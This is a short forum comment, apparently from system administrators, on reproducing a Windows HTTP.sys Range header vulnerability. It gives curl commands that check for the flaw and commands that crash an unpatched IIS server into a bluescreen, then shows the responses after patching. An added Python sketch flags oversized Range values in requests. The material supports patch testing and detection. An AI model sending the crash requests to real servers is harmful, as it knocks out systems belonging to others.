by Satchelmouth
4088 days ago
I can confirm on Windows 2K8R2 and 2K12, with Kernel Caching enabled (as per default IIS settings) and without any Kernel Caching rules, that I can reproduce the issue using the cURL method.

Steps to reproduce.

Check server is vulnerable

curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615"

You should see an Error 416.

Force crash

curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615"
--and/or--
curl -v http://blah.com/images/blah.jpg -H "Range: bytes=40-18446744073709551615"

Note above: You have to specifically address a file AND use byte range 40 or 100 in my setup to make it bluescreen.

After Patching - Check Vulnerability

curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615"

Response: Error 400: The request has an invalid header name

After Patching - Force Crash Test

curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615"

Response: 206 Partial Content

Hope that helps.
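A detection-side sketch for the Range values shown in the comment above, added here as an example and not part of the original post: it parses the Range header out of a raw HTTP request (as a proxy or packet capture would record it) and flags any byte range with a bound too large to be a real file offset. The function names, the 2^63 threshold and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumed cut-off: no legitimate file offset needs the top bit of a 64-bit value.
# The requests in the comment use 18446744073709551615, which is 2**64 - 1.
THRESHOLD = 2**63

# One byte-range-spec: "first-last", "first-" or "-suffix".
_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def range_header(raw_request):
    """Return the Range header value from a raw HTTP request, or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "range":   # header names are case-insensitive
            return value.strip()
    return None

def _too_big(digits, threshold):
    digits = digits.lstrip("0")
    # More than 20 digits cannot fit in 64 bits; checking length first also
    # avoids calling int() on an arbitrarily long attacker-supplied string.
    return len(digits) > 20 or (digits != "" and int(digits) >= threshold)

def suspicious_ranges(value, threshold=THRESHOLD):
    """Return the byte-range specs in a Range value with an oversized bound."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return []
    hits = []
    for spec in specs.split(","):
        m = _SPEC.match(spec)
        if m and any(_too_big(b, threshold) for b in m.groups()):
            hits.append(spec.strip())
    return hits

def flag_request(raw_request):
    value = range_header(raw_request)
    return suspicious_ranges(value) if value else []

# Constructed sample requests (not captured traffic).
SAMPLES = [
    "GET /images/blah.jpg HTTP/1.1\r\nHost: blah.com\r\nRange: bytes=100-18446744073709551615\r\n\r\n",
    "GET /video.mp4 HTTP/1.1\r\nHost: blah.com\r\nRange: bytes=0-1023, 2048-\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: blah.com\r\nrange: bytes=00-18446744073709551615\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: blah.com\r\nRange: bytes=0-" + "9" * 5000 + "\r\n\r\n",
]

if __name__ == "__main__":
    for req in SAMPLES:
        print(req.split("\r\n", 1)[0], "->", [h[:30] for h in flag_request(req)])
```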